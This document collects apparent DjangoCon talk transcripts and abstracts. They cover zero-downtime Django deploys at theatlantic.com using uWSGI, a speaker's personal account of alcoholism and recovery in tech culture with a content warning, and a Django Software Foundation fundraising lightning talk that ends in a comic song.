you know, 5 VMs, which are all actually sitting on three bare metal machines, this could take 30 seconds, 45 seconds. And during that period of time, all these requests are queuing up. And basically the server, by the time the server is responding, it's still being overwhelmed by requests. And there were a few times where we had to do like rolling restarts of our server and actually bring them down and take them out of rotation and nginx just that they could kind of cool off and be able to respond again. So what he suggested was, why don't you, rather than having like a stage and a live that are separate and, you know, doing the switch basically like at the deploy time, load the code and touch the whizgy first and then switch the simlinks. Basically have like A and B sim link to stage and live so that you have the A and the B folders are always production ready. In any given case, one of them is either one version ahead or one version behind what's currently on production. So in every other respect, the CDN path that they're using, the database, they're production. You force as much code as possible to load before defining your def application in your whizgy file. This is less important for modwhizgy, but we switched to uwhizgy. And one of the things that's nice when you're using uwhizgy and you set up, again, with the sort of silly names for Python and Django projects, is the Zerg mode where you have like the way Zerg mode works. 
You have a Zerg server which is really very bare bones. All it does is it just like listens for workers. And then the Zergs, when they come online, they communicate to the Zerg server that they are accepting requests. And it's only at that point that the Zerg server routes requests to them. So this gives them the freedom to sort of, you know, take as long as they need basically to get everything loaded up into memory and preload everything before it even needs to deal with the incoming requests. And the Zerg server handles the queue. And then before swapping the upstream, after they've been preloaded, we warm them up with a number of simultaneous concurrent HTTP requests that basically make sure that all the workers get a request with a cache busted URL so that they're all primed. So why did we switch from modwhizgy to uwhizgy? There's, I think, a lot of misinformation about whiskey servers and, you know, performance benchmarks and things like that. I think generally the comparisons and the configurations aren't very reliable. And the thing being tested often doesn't apply to the real world. There's something like how many concurrent hello world responses can you serve up at any given moment? Modwhizgy in general, it's comparable to performance, like I said. It runs on Apache HTTP server, which is, you know, whatever. Mostly the work of a single developer. The documentation is terminally out of date. The configuration options are missing or only discoverable on the release notes, which is something that's openly admitted in the documentation. Kind of like the summary of the GitHub pages kind of demonstrates the balance between where the community's gone with modwhizgy and uwhizgy. So uwhizgy brought an active community, very thorough documentation. In fact, it's kind of overwhelming, but also highly configurable. And so when I was rehearsing this talk, there were a couple slides that I don't think I'm going to have time to get through. But I do have a GitHub repository which has some demo code that kind of demonstrates how we're using uwhizgy emperor mode and Zerg mode. And the uwhizgy stats server to kind of monitor our whizgy applications, preload everything using a fabric script. So, you know, I'll just sort of reference everyone, refer everyone to that and sort of as a teaser kind of show what our uwhizgy monitoring page looks like. So it looks something like this. We use emperor mode. Emperor mode basically is a way where you can dynamically set up multiple configurations for a single code base. We have like one really large code base that hosts all the Atlantic properties, City Lab, the wire, the Atlantic.com. We have a profile site which is for people to manage their print subscriptions. We have a sponsored section of the site. And we have an A and a B version of all those things. And then also we have a CMS that's for our editors and a CMS called Waldo that's for outside video contributors. So we go to this page. We can see in real time as requests come in. Here we go. It sort of changes. You can sort of hover over the little dots to see information that's pulled from the uwhizgy stats server. If the site starts to get overwhelmed, there's a little cue monitor down at the bottom. Generally if the cue fills up a little bit, that's normal. That's sort of expected. And we have one of the things you can do with the Zerg mode is dynamically spin up instances based on how busy the other worker processes are. 
So when these requests come in, it spawns new processes and then it's able to handle the increased volume that's coming in. So up here, these are the URLs to the GitHub repository. I actually haven't pushed it yet, but by the time this video is online, it'll be there. I think it'll probably be sometime later this week. I'm @FrankieDentino; I don't really use Twitter much, but it's an easy way to get hold of me, or you can email me at frankie@theatlantic.com. And with the time I have left, I'll open it up to any questions. Great talk. Thank you. So the question is: basically all end-user traffic that hits theatlantic.com is served through a CDN, but then that CDN is basically talking to Django across the board, so is the entire site served off of Django? I guess that's the high-level question. Yeah, well, mostly. I mean, there are a couple of really, really random legacy pages that look really old and they are really old, but 99% of the traffic goes through Django. And like the home page and all the way through the back catalog, right? Yeah, and as far as the CDN is concerned, a small portion of the requests will get through the CDN. You know, we generally have about a three minute page cache for every page, and then we have longer ones for some, you know, older pages that haven't been updated in a while. But most of the requests that get past that are actually bots and crawlers. We have an archive, I mean, we've been printing since 1857, and we basically have everything online that we have the rights to. You would think that a print magazine would have digital publishing rights to all their articles, but you would be wrong. That is not the case. But everything that we do have the rights to and that we've digitized is free online. So, you know, we don't generally have an issue when people crawl our site if they're doing it in good faith. But occasionally there's like an AWS instance that'll make like 200 concurrent requests every second and sort of makes our servers melt. And so we have to kind of scramble to block it. And so a lot of this was like kind of dealing with that and getting us in a place where we could handle those sorts of situations without breaking a sweat. Great. Thank you. Hi. So you talked about using mod_wsgi and switching over to uWSGI. There's a third option that a lot of people use, which is Gunicorn. I was just wondering if you thought about Gunicorn and didn't go with it, or just didn't have time once you had seen how big uWSGI was. Do you have an opinion on that? I don't actually. I know people have had a lot of success with it. I don't really have a strong opinion one way or the other. uWSGI just kind of worked for us, but from what I understand Gunicorn is on par with uWSGI in terms of features and performance. So you didn't look at Gunicorn and decide like, oh, that's not going to work for us. No. Okay. Thanks. Sure. Yeah. You mentioned earlier that you thought some ORM caching was kind of a mixed bag. Can you go into more detail why you think so? Sure. Yeah. So we ran Django Cache Machine for a really long time on our site and then actually kind of accidentally turned it off. And this wasn't the first time we've accidentally turned off caching. But in this case, there was really no performance difference. And we kind of speculated about why that might be. And the conclusion we came to is that our situation is maybe unique. We're unique because we're not in the cloud.
We're in a data center. It's all, you know, in Reston, Virginia, all like connected via Fibre Channel. So there's not much latency between the servers and the database. And the database is pretty well tuned for reads, because we don't have a lot of writes; you know, the editors publish maybe 20 stories a day versus people reading millions of stories a day. So the database is generally not a bottleneck for us. And the model instantiation and hydration, and basically the unpickling and creating of the model instances, was taking almost as much time as if we were just doing normal ORM queries to the database. So it really didn't make a big difference. But I think that in cases where you're on a cloud where there's latency between your application servers and your database servers, or when you have situations where writes and reads are more balanced, then, like I said, it's a mixed bag; it might be useful. Thank you. Thank you.
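As a footnote to that last answer, here is a hedged sketch of the .values() swap mentioned at the top of this excerpt and again in the ORM caching discussion: grouping related rows by hand instead of letting prefetch_related hydrate every row into a model instance. The Article and Tag models are hypothetical stand-ins, not code from theatlantic.com.

```python
# Hypothetical models: Article has a ManyToManyField named "tags" to Tag.
from collections import defaultdict

from myapp.models import Article, Tag  # hypothetical app and models

# prefetch_related: two queries, but every related Tag row is turned
# into a full model instance before its name is ever read.
articles = Article.objects.prefetch_related("tags")
titles_to_tags = {a.title: [t.name for t in a.tags.all()] for a in articles}

# .values(): the same data as plain dicts, grouped manually, which
# skips the per-row model instantiation and hydration cost entirely.
articles = list(Article.objects.all())
rows = Tag.objects.filter(article__in=articles).values("article__pk", "name")
tags_by_article = defaultdict(list)
for row in rows:
    tags_by_article[row["article__pk"]].append(row["name"])
titles_to_tags = {a.title: tags_by_article[a.pk] for a in articles}
```

Whether the extra bookkeeping is worth it depends on exactly the trade-off described in the answer above: how expensive model hydration is relative to the queries themselves.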
|
One year ago we completed a years-long project of migrating theatlantic.com from a sprawling PHP codebase to a Python application built on Django. Our first attempt at a load-balanced Python stack had serious flaws, as we quickly learned. Since then we have completely remade our stack from the bottom up; we have built tools that improve our ability to monitor for performance and service degradation; and we have developed a deployment process that incorporates automated testing and that allows us to push out updates without incurring any downtime. I will discuss the mistakes we made, the steps we took to identify performance problems and server resource issues, what our current stack looks like, and how we achieved the holy grail of zero-downtime deploys.
|
10.5446/32703 (DOI)
|
Come on, y'all! I tend to be a little loud and do some wild gesticulations, so please bear with me if I go a little overboard or I'm a little loud. But I do want to start with a content warning and a trigger warning right up front. This talk is going to discuss alcohol and drug use and some frank sexual discussions. Nothing gratuitous. But these conversations really aren't easy when we're talking about a progressive, deadly disease, and that's what addiction is. So if you're uncomfortable, please don't hesitate to leave at any point. I don't want anyone to feel uncomfortable and I will not be offended. So without further ado. So I'm Tim. As Mikhail said, I'm an IT director of advanced initiatives at the Wharton School, for Wharton Research Data Services. You can find me everywhere as Flipper PA. I'm a Pythonista and Django nut. I'm a DjangoCon organizer. I'm the Wharton liaison. I'm a fun-loving nerd, a hockey fan and a guitarist. And I'm also an alcoholic addict in recovery. I'm really glad to be here today. In recovery, we take one day at a time. I truly believe, to bookend Saran's talk, that we are all extremely lucky to get paid to do what we love. For some context, this talk was first given at Bar Camp Philly in a slightly different form, which was a highlight of my year last November. And I want to get it right out front that being an addict is just part of what makes me me. This disease can really affect everybody. In recovery, we say from Yale to jail. But here, in Philadelphia, I like to modify that. From state pen to Penn State. And there will be some laughs in this as well. So feel free to laugh at my high school and college fashion choices as we go through. But it is a serious topic. And chances are there are a fair number of people struggling with this disease here today. Now, I should have said spoiler alert in the last keynote before I shared this part of the story about Simon. But I grew up with two loving parents and a little sister, hi, Marianna. Both my parents are academics, foreign language teachers, and I had a thing for computer languages. So again, I consider myself extremely lucky and privileged. I was really born on third base in baseball terms. I lived here in University City. I went to St. Mary's Nursery School growing up, which is the DjangoCon childcare provider. We provide childcare. And had a pretty normal middle class childhood. My godfather, Uncle Charlie, was actually quite a computer scientist. In 1974, the year I was born, he wrote a book called An Introduction to the Theory of Computing. And was the guy who wrote the assembly code on the chip of the memory game Simon that you can see behind me. So I remember being very young, being around computers, eight inch floppy disks, double-sided, back in the day. And it wasn't long. My dad brought home a computer when I was seven, an IBM PC 8088 with two five-and-a-quarter-inch, full-height floppy drives. And soon after that, I got my own computer when I was about 12. And soon after that started a BBS, which is what we did before the internet existed. We dialed up to one another. It was called Wellen and Swight Dragon. And I still remember the number. It was 215-879-1682. I often wonder if the people who have that number now actually still get the dial-up, that horrible modem noise. So, you know, I had a pretty, very, very lucky, privileged upbringing. Fast forward to when I was 12. I left my comfort zone of University City and my parents moved out toward the suburbs. And I had never really felt like I fit in at school or anywhere.
And this is a recurring theme you'll hear amongst addicts. You know, my computer was my best friend in many ways. My BBS was getting pretty popular. And I met a lot of other local BBSers, including some of the programmers behind the BBS system I used at the time, the Phoenix BBS. Unfortunately, at about that age, I was abused by one of the older programmers when I was 13. I completely hid it for many, many years. And this is part of what kind of started a cycle of shame and hiding things from people for many, many years. I started drinking and smoking marijuana in high school. And because of this, I started to feel like I belonged in social circles really for the first time. We didn't have meetup groups back then for computer geeks. Dungeons and Dragons was about the only one of my few social outlets. So it was difficult. And we fast forward to college. Feel free to laugh. Little did I know, I was a prime candidate to become an alcoholic addict. I started drinking and doing drugs every day. And this was about the same time I began to open up about the abuse I had gone through. So I was exploring, like many of us do in college. And alcohol and drugs helped me be social. I was popular and accepted for the first time ever. I wasn't always the greatest student, but I'd always loved computers. So I was heavily invested in my major. And got heavily involved in the early internet and the web. I started a site called PhillyMusic.com in the mid-90s, which was the first organized local music scene on the web, which eventually grew into a PHP MySQL site after starting with server-side includes, the height of technology at the time. And somehow I managed to graduate on time, which was another start of something called denial, because I couldn't be an alcoholic. I graduated on time. I did well with my customized computer science degree that put together computer science and psychology, or as I like to refer to them now: how to mess with people's heads, part A and part B. I was convinced I'd grow out of it someday. I was just being young. So I did the logical thing and I moved to Jacksonville, Florida to get away from it all for a job. Jacksonville is the worst place on the planet. There is absolutely no diversity down there. The tech scene was horrible, but it did manage to clean me up a little bit. But the drinking was always there. The drinking hung on. I got off, you know, I stopped doing some of the harder drugs I'd gotten into by that point. But the drinking and the socializing, it was still such a crutch for me to be able to socialize with people, to be able to break down the barriers, to be able to talk to other people, to be accepted by people. That's why people do drink so often at the bar. If you think about it, and Miss Representation was referenced in our last talk, there's another great documentary called The Mask You Live In, done by the same directors and film producers, which talks about how men are taught to suppress their emotions from a very young age. If you're age five and you're crying in public, it's a problem. And if you're crying at age 10, watch out. We are trained to do this from the time we grow up. And it's to the detriment of all of us. Now think about guys at the bar. It's the one time they'll say things like, oh, I love you, bro. Love you. Or, you know, actually cry or open up about their emotions.
This addiction cycle is partially, I believe, responsible because of how much we suppress our emotions and don't have actual conversations about what we are feeling, what we are doing, and it affects both men and women. Moving on to my career. CD Now, great place to work. It was a great place to start, but they had beer on tap in the tech department and lots of drinking. So of course, you know, the location once again had to be the cause of my drinking problem. It couldn't be Philadelphia. It couldn't be Jacksonville. It couldn't be the company I was at. It had to be me, but I was still in denial about it being the place I was at. So I thought a bank would be a more straight-laced place to work. I was incorrect. It was an interesting start-up of a bank. I actually got to design a bank for David Bowie, and I had a Bowie card for a little while. The guy running it kind of looked like William Shatner and kind of acted like William Shatner, and kept a bottle of vodka in my desk back in the tech department that he would pop off to have a sip from during board meetings. So it was really not a great place for an alcoholic to work. But you know, we talk about there being a lot of alcoholism in the tech industry, but then I think about it. We also talk about there being a lot of drinking among lawyers, in construction. I mean, is there an industry that doesn't have it? Maybe if you're a door-to-door Mormon religion salesman, that might be the one. But really, there is a heavy drinking culture in every industry. It's not just tech. We are just at a higher risk because of the behaviors that we tend to engage in. So I started my own companies. I've started two companies and taken them to sale. The first one, Digital Content Solutions, got bought up by a local company called Crompco that not only had beer on tap, they had a Jaeger machine in the garage. So literally every stop I had until Wharton had a very, very heavy drinking culture. Now, I'm not blaming the companies. Tech just has this culture, which is literally a petri dish for addiction. It's filled with temptations for alcoholics and addicts at every turn. Back at CDNOW, we were translating the site for many different languages, and we would have an Afghani translation meeting at about 11:30 a.m. on Fridays, where we would smoke pot in the parking lot and then go to an all-you-can-eat Chinese buffet. Do the math. We got our money's worth. But alcoholism has followed me despite all these changes of scenery. It's my disease to own. And I clearly was not growing out of drinking. I had been pretty successful, which gave me a big form of denial. My career in technology: I worked in tech and on the Philly tech scene since 1996. I started three companies, taking two to sale, as I mentioned. I started the SLCC, the Second Life Community Convention, in 2005, which became the biggest virtual worlds convention in the world. I served as the vice president of PANMA, the Philadelphia Area New Media Association. If you're from the Philadelphia area, I highly recommend checking it out. And I was also the co-chair of Bar Camp Philadelphia, which is still the largest and most active bar camp in the nation, as well as helping run the Wharton Web Conference right here. I was a contributor to open source projects. And the funny thing is, if anybody treated me the way I was treating myself at the time, I'd be in prison for murder. Alcohol-fueled creativity is such a total myth. Hackathons at bars? I've done it.
You know, James Joyce said, write drunk, edit sober, and we had modified that to code drunk, debug sober. It's really total BS. This myth of the rock star programmer is one that just needs to die, because for me, everything became a reason to drink. A promotion at work, a friend got a raise, a business deal got done. Drink. A problem at work, a friend got fired, a business deal did not go through. Drink. Coworkers are going out. Drink. Death in the family. Drink. My nephew was born. Drink. I was drinking when I found out my nephew was born. I was having a party. I missed his first birthday because I was hungover. I called my family and said I was too sick to go. Little did I know I was actually telling the truth then. I was sick. I have a disease. It's a deadly, progressive disease. The second birthday, I was in rehab and I wrote him a letter, because my uncle has this disease and just celebrated 30 years sober. I have this disease. I do not know if my nephew is going to get this disease, but I do want to have a conversation with him at some point about it, and know he can always talk to me. The shame continued to build. I was successful, but I was in denial. After every season of the Flyers, our local hockey team, ended, I would try to take a month off from drinking with varying degrees of success. So Brené Brown is a professor at the University of Houston's Graduate School of Social Work, and she is considered a leading researcher on shame. I've become a big fan since I've been in recovery. Shame is one of the most primitive emotions, and no one wants to talk about it. And shame can quietly marinate over a lifetime. So here are some of her quotes on shame. I think shame is deadly, and I think we are swimming in it deep. The less you talk about it, the more you got it. Shame depends on buying into the belief that you are alone. Shame cannot survive being spoken. Shame cannot survive empathy. Empathy and altruism are absolute keys to a strong community, and the amount I've witnessed here at DjangoCon and within the Django community is absolutely amazing. The fact we can have these conversations, these absolutely wonderful conversations that are difficult but need to happen, as Russ showed us last year with his talk on depression, are ones we must have to really have a healthy community. Let's consider the stigma around alcoholism for a moment. I can have a beer at lunch, right? It is Friday. Look at the table. Would you smoke in front of a cancer patient? You blacked out because you were wasted. That was hilarious. Would you think it was hilarious if somebody with Alzheimer's didn't recall something? These are diseases. Why don't you just try beer? No hard stuff. Yeah, because addicts are obviously great with limits. The stigma makes it really hard for people with this disease to get help. It is not a question of willpower any more than you can will another disease to go away. I avoided recovery for years after knowing I had a problem because of the whole God thing, which was just an excuse. I told you about taking a month off after the Flyers were eliminated from the playoffs. That was one of multiple attempts to stop. Really just another form of denial. Oh, I can stop for a couple of weeks. I must not be an alcoholic. That said, I will take this disease over any other. I don't have cancer. I don't have AIDS. My medicine is that I get together with a bunch of friends for an hour and talk about my biggest problem and my favorite subject, me. So some uncomfortable facts to consider.
One in six Americans binge drink four or more times a month by CDC estimates, and that number is higher in technology circles. For me, it became daily or every other day. I'd party all weekend long, sometimes into Monday. I'd be the one planning the party after work. Happy hour with coworkers. They'd go home like normal earthlings. I'd go on to the dirtiest, dingiest dive bar I could find in South Philly. Eating often became an afterthought. When you start getting text messages from bartenders at 7:05 a.m. on a Saturday saying you're late, that's what's known as a hidden indicator. It might be time to get help. Excessive drinking costs America $255 billion in crime, medical care, and lost productivity annually. You know, I'd avoid missing work, because that might mean I'm an alcoholic. I've also always loved what I do. So I really threw myself into my career as a way to justify my bad behavior by saying, oh, I've got a full-time job. I'm doing well at work. That was the one thing I could hang on to that would get me through. I made sure to keep up appearances and always perform. I made calendar appointments in my phone so I didn't forget anything. One in every 10 Americans over the age of 12 is addicted to alcohol or drugs, roughly equal to the entire population of Texas. This is why it's so important that we have these conversations. I drank heavily from the age of 18 to 40. This disease is deadly and progressive, and there is help out there. So of that population the size of Texas, only 11% ever received treatment. My sobriety date is April 12, 2015. It was the last day of PyCon 2015. I saw a talk by Jacob Kaplan-Moss called the Talent Myth, talking about the myth of the rockstar developer. An amazing talk. Go watch it on YouTube after we're done here. It's really an absolute must-watch for everybody on the planet, let alone our community. This helped put me, and I'm not saying Jacob Kaplan-Moss got me sober. What I am saying is that it put me in the right mindset. I had had a great week at PyCon, but it involved a lot of heavy drinking. Jacob's talk put me in the right mind frame so that when I came back from PyCon the next morning, my family was gathered in my living room, knowing that the Flyers had just been eliminated from the playoffs and I was about to embark on my yearly attempt at a month off. I was in the right mindset for what they had to say. And I entered rehab and it's probably the best decision I ever made, other than maybe asking my wife to marry me. So, some uncomfortable facts to consider, continued. 23 million Americans self-identify as being in recovery from drug or alcohol addiction. 23 million. That's a lot of this country. And worldwide, do the math. I got away from everything for a month and started to build my recovery experience toolbox, the experience toolbox of how to handle situations. I was worried about leaving my colleagues up the river without a paddle, in the lurch. You know what's funny? Believe it or not, the world kept spinning without me at work. It was absolutely incredible. I wouldn't have believed it. But there are really no excuses not to get the help you need. It will make your life so much better. It was Lou Gehrig who said, today I consider myself the happiest man, the luckiest man in the world. Today, I really do consider myself the luckiest person in the world. So really, if you have a problem, please reach out to me or somebody else. It'll be kept confidential. We can talk. There's some uncomfortable facts in DjangoCon terms.
There are about 450 attendees here at DjangoCon. We sold out. Great work, Jeff and the whole team. Approximately 45 of those people are addicted to alcohol or drugs and are actively using. Approximately five will receive treatment, and I am one of those five. Let's examine our culture and community a little bit. Programming and startup culture, we've heard it many times here already. How many companies have you seen with beer on tap, a bar, micro brews in the fridge, offered as a perk? People in technology are already at high risk for alcoholism and addiction. The obsessive compulsive behavior is celebrated and it's all around us. Digital design and tech in general has a culture of promoting alcohol use. Normal drinkers are capable of having a few drinks and stopping. They absolutely have that right. For those of us who cannot stop, where one drink is too many and there's never enough, it's really a temptation we have to remove. I used to say things like, oh, I'm not a problem drinker. I'm a solutions drinker. I don't drink to have a good time. I drink to stop the voices in my head. Turns out those voices are your friends sometimes. Conscience, motivation, empathy, they get buried under the sea of addiction you're swimming in. So our culture encourages heavy drinking as a way of socializing, networking, and business. I sold one of my companies in a bar. There are a fair number of us who can't just stop, which leads us on a destructive path. When alcohol becomes a perk of the workplace, we risk alienating people in the quest for cool. This is unacceptable. The stigma of this disease will often prevent people who have a problem from expressing it. It did for me for many years. There are quite literally people who should be at this event who are not here because of this disease. I want you to meet Nick D. Nick was my rehab roommate at the Melbourne Institute Rehab in April 2015 during detox. It's about the lowest point you could imagine in life, filled with shame. So it does create a bond between roommates who are going through detox together. Sort of an in-the-bunker, foxhole mentality. Again, we weren't best friends, but we had been doing well in early recovery. We'd see each other at alumni nights back at the rehab; every Tuesday night we'd go back, even very early on, to show the people who are currently in there that there is hope. I saw Nick on Tuesday, October 20th, 2015 at Melbourne alumni night and he seemed to be doing really well. We were about six months in at the time. On Monday, October 26th, a couple days before I gave this talk for the first time, Nick relapsed, overdosed, and died at age 24. This is a deadly, progressive disease and it needs to be addressed. So what can we do? Get professional help if you have a problem. Recognize the stigma. Tell a friend to get professional help; an intervention can save a life, even if it doesn't work the first time. Don't be afraid to talk about it. These topics have to be on the table. Care instead of mockery, empathy not judgment. Don't celebrate this disease. Sentiments like work hard, play hard are bullshit. What are we, kindergartners? Oh, you get to go for recess. You worked hard today. Examine your work culture. Penn, Wharton and my boss are absolutely amazing and supported me in every way to get the help I need. Without any shame, I've had nothing but support. Can we say that about many other workplaces? Again, I'm not here to tell any earthlings who can drink responsibly to stop drinking.
I believe in having fun and absolutely insist on enjoying life, but if you're like me, you'll know you have a problem. And if you think you have a problem, please, please get help. Reach out to me. I will talk to any of you about this. Part of my medicine is helping another alcoholic or addict get the help they need. It helps keep me sober. So the miracle. I have a daily reprieve from the urge to drink. I reach out to other alcoholics and try to help them. And in doing so, I help myself. I've been sober on my birthdays for the first time since before Nirvana's Nevermind was released. I've had more honest laughter and joy in my life than I've had in 22 years of addiction. I get to spend a ton of time with my nephew watching him grow up. He's three and lives five blocks from me. I actually enjoy being myself again. It's a miracle. So I'm going to close with this. Yesterday is history. Tomorrow is a mystery. Today is a gift. That's why we call it the present. Be sure you do something nice for someone else today. And by the way, if they find out, it doesn't count. Altruism is its own reward. And it's the key to recovery. It's helping another alcoholic or addict out. Every day isn't perfect. I strive for progress, not perfection. I am really lucky that there is a solution to my disease. And once again, I get to hang out with a bunch of my close friends who are like I am and talk about my favorite topic and biggest problem, me, almost every day, if not twice a day. And life is good. So I really want to thank the Django community for providing a platform where we can talk about the really important issues. If there is an issue of any type you want to bring up, the Django community is a place that will embrace it. And that is one of our greatest strengths. Put the technology aside. Come for the technology. Stay for the community. That's all of you. That's everyone here and everyone across the world. It's one of the most amazing communities I've ever been a part of. I give a talk on how Wharton found Django. And I talk about all the technical things. And we went through analyzing what kind of plug-in ecosystem it has and how the ORM works. And at the end of it, I talk about how damn lucky we got by landing on such an amazing tech community. The Django community and the Python community have been absolutely amazing in embracing Wharton as we've moved to Python and Django as our framework and language of choice. And you know, everybody who supported me, the Django community, my wonderful colleagues, my friends and my family, the warmth has been great. The lack of judgment has been amazing. The understanding of the fact that I have to put significant time into recovery has been amazing. But most importantly, I can now say, hi, I'm Tim, and I'm an alcoholic, and thanks for letting me share. Thank you. Thanks so much, heartwarming. If anybody has any comments or anything they'd like to share, we've got a couple of minutes before lunch. And thanks so much. I think I'll just say for everyone, thank you so much for sharing, and thank you so much for telling us your story. Thanks, Russ. Hi, Tim. Hey, Alex. Do you think communities where they serve alcohol and that's kind of a normalized thing are uninclusive to people who are recovering from alcoholism? It's like, I mean, I'm a vegan and sometimes it bothers me when people around me are eating meat, and it makes me feel a little bit uncomfortable.
I'm wondering if that's sort of the same thing, like if you feel uncomfortable when people around you are drinking. It does when it's really the focus of an event, but for me it may be very different than for any other alcoholic or addict. So some alcoholics and addicts have different triggers. I am not okay when the focus of an event is the bar, the alcohol. And I was partially responsible for leading those kinds of events before, lest I sound like a total hypocrite, when I was in my active addiction. But things like the Monday night bowling night, where it is not the focus and people are having drinks, I'm okay with that. Not every alcoholic and addict will be. But I think the key here is to find a balance, because I don't know of any alcoholics or addicts who want everybody to stop drinking because we have a problem. Again, we're a small part of the population, but we do exist. And as a vegetarian, I can relate, but I was very glad to see DjangoCon once again showing how amazing it is, with a tagged vegetarian/vegan table yesterday. Thank you, Ryan Sullivan and Alex for putting that together. It's just another example of how amazing and inclusive this community really is. I completely agree. Thank you, Tim. Thanks, Alex. Thank you, Tim, for a really amazing and honest talk. I know that some of us here work at companies that do have the beer on tap and do have sort of a heavy drinking culture. Do you have any tips about how we can approach the people in power in our workplaces to maybe at least remove the kegerator? Yeah, sometimes it's hard because it's so entrenched in the culture. My last company, for example, was a very blue-collar, rough-and-tumble, man-up type of community. So it's a very difficult thing to broach, depending on the context. But I think more and more this topic gets talked about, and it gets easier and easier, especially with things like YouTube where you can find all kinds of resources, or the statistics I quoted here, when you actually put them out there. I think there are a lot of people who just don't realize how large a problem this is. However, it's getting a lot of attention. And the problems we're having with opiate addiction in this country now, especially with companies that have promoted opiates as non-addicting, OxyContin in particular, have gotten a lot of attention. And while that's a very sad story, when you hear stories about senior citizens who are copping heroin because they can't afford their opiates anymore, and the effect opiates have had on the suburbs, that's not something they can sweep under the rug anymore. So I think it's getting noticed a lot more. So there are a lot more resources out there, and the conversation has started, which has made me proud to be in recovery. Thanks, Lacey. All right. I think it's lunchtime. I'm going to go listen to some very loud music in the data center for a few minutes, but I'll be up there to see you all soon. Thanks so much. Heartwarming. You all are amazing and awesome. Thank you, DjangoCon. Thank you.
|
Technology professionals have been in high demand for several decades, and this demand for talent has caused a culture to emerge that often turns a blind eye to those who may be struggling with alcoholism and addiction. We have to come together to avoid this "petri dish" continuing to exist, by watching out for ourselves, and one another. The CDC estimates that ten percent of Americans suffer from the disease of addiction, and only nine percent of addicts ever receive treatment. This "petri dish" of technology culture makes it even harder for those of us with careers in the field. Recovery can be a wonderful journey for those of us who suffer from the disease, and I hope by sharing some of my journey, people will take a step back and consider what we can do to improve the culture for everyone. Content warnings: this will be frank discussion that may involve colorful language, and topics including drug and alcohol abuse, death from addiction and sexual abuse.
|
10.5446/32707 (DOI)
|
Come on, y'all! Okay, so who in here is playing Pokemon Go and you're willing to admit it? Okay, who's gotten anything like really cool they want to lift up? Like this morning driving here there was a Venusaur like in the wild. I was like what, has anybody gotten anything really cool? No? Yeah? Okay. Yeah, awesome. Alright, cool. Well let's play together because I still haven't battled yet and I'm like level eight now. Alright, so hi everyone. I'm Adrienne. You can find me on Twitter at Adriennefriend. I am Django's director of advancement. What? What does that mean? So the Django project has two paid contractors, me and Tim Graham. You probably are more familiar with Tim's work. He is the one who makes Django go. Do you know about the Django Software Foundation? The DSF is the non-profit that's behind Django, that administers Django. We're run by a board of directors: Frank Wiles, Daniella, who organized DjangoCon Europe last year, James Bennett, Karen Tracy, Rebecca Conley is our new secretary, and Kristoff is our treasurer. I work really closely with him. And then there are the two of us, your Django staff. This is Tim getting your issues. That's actually how he gets them. And me, just the two of us. So the DSF is the non-profit behind Django and our main focus is the direct support of Django's developers. This means organizing and funding sprints. We often sponsor the sprints at conferences. Helping folks attend the sprints. Getting to a conference is expensive, so we provide grants for that. We provide financial assistance to Django Girls. We fund the Django Fellowship Program, which is Tim's work. That's Tim, trying to make something close to a real developer salary while making Django happen. So here's a little bit of Tim's work at a glance, just based on what I pulled down from our recent posts about his work. He does a lot. Before we contracted with Tim officially about a year ago, as of February, releases just happened when they happened. Tim keeps them on a regular schedule, and he keeps the community updated about what's happening. He's a hugely valuable asset to us. If you want some more, you can join the Django developers mailing list and get his weekly updates about what he's working on. In February, he was renewed for another six months of funding until September of this year, and he would love to keep going, but we need the funding to make it happen. We also want to keep making a difference for Django Girls. In Django Girls Poland last year, we supported them four times, and they said that when they approached different local companies about their workshops, the companies didn't really understand why it was important, but the DSF made it possible. So there are some ways you can get involved, and we need you. Yes, you. In this storm, we need you. There are some different ways you can get involved. You can become a corporate member. If your company is built with Django, if you use Django, show support to Django as a corporate member. There are three levels of membership: silver, gold, and platinum. There are tons of benefits, including badges that you can put on your website. That's something that the community had been asking for for a while, and we made it happen. So I just want to give a shout out to some of our current corporate members. There are three slides, so take a look. Look and see if you see your company on here. If you don't see your company on these slides, we need to talk. Let's talk. A few more. A few more. Were you up there? Let's talk. All right.
Now, this is something everyone can become. You can become a leadership level donor. This is a big commitment to Django when you think about it. You're just giving $1,000 or more per year in a calendar year. You get a logo or a picture on our main fundraising page, which is what everyone goes to, and you get a special badge that you can use wherever you like. So leadership level donations may seem big, but the cool thing is that they can be recurring. We make it easy to give on a schedule. So if you give $100 a month to Django for a year, you become a leadership level donor. So why not do that? We have a number of folks in our community who do that, and you can sign up right on our website, making a monthly, quarterly, or yearly donation. We also run special campaigns. Right now, we have a partnership with JetBrains and PyCharm. You can get PyCharm at 30% off, and for every purchase that we make, they're going to make a donation to Django, so take advantage of that and help donate to Django. So I want to finish up my lightning talk here with a challenge, a pretty big audacious challenge. One of those, not one of those. So this is where we're currently standing when I pulled this slide down like an hour ago. We're 34.5% funded. We're at nearly 69,000 donated of our yearly goal of 200,000, and that's composed of 231 donors. I want us to get to 100K. We're more than halfway through the year. Our goal is 200,000. Let's get to 100,000 by the close of sprints on Friday. Let's book these corporate memberships. Let's make our personal commitments to Django, and let's grow that heart to 50% full by the end of this week. And if that sounds a little nutty to you, keep in mind we've done this before. When we launched in January of 2015, this community gave $30,000 in six days. So that's what we're doing. Let's make it happen, and let's stay in touch. Thanks. I am the very model of a modern Django model, for I can handle anything, even emoji and cuneiform. My data can be accessed through an elegant and mature ORM. Some criticize the white space in my language with a lot of scorn, but when you are quite used to this, you probably think it is as easy as the norm. While building sites you'll probably end up building lots and lots of views, to service all the shopping carts and sometimes even read the news. The design assets will be safely stored out there in static files. The pretty is completed by the use of some cascading styles, but while I'm out there handling all that emoji and cuneiform, I'm still the very model of a modern Django model. My models can be entered into any modern database, but really you should use Postgres like anybody with good taste. Atomic transactions can let me handle failures with good grace. i18n and l10n can run in any place. Output can be escaped by default, helps stop all the egg on face, and future errors are prevented with a sturdy testing base, but nothing can protect you from a dev-op who is feeling smug, who edits in production and then introduces nasty bugs. And that's why you all should have a comprehensive monitoring scheme, alerting to activities of hackers who are being mean. Yet still I'm out there handling all that emoji and cuneiform because I am the model of a modern Django model.
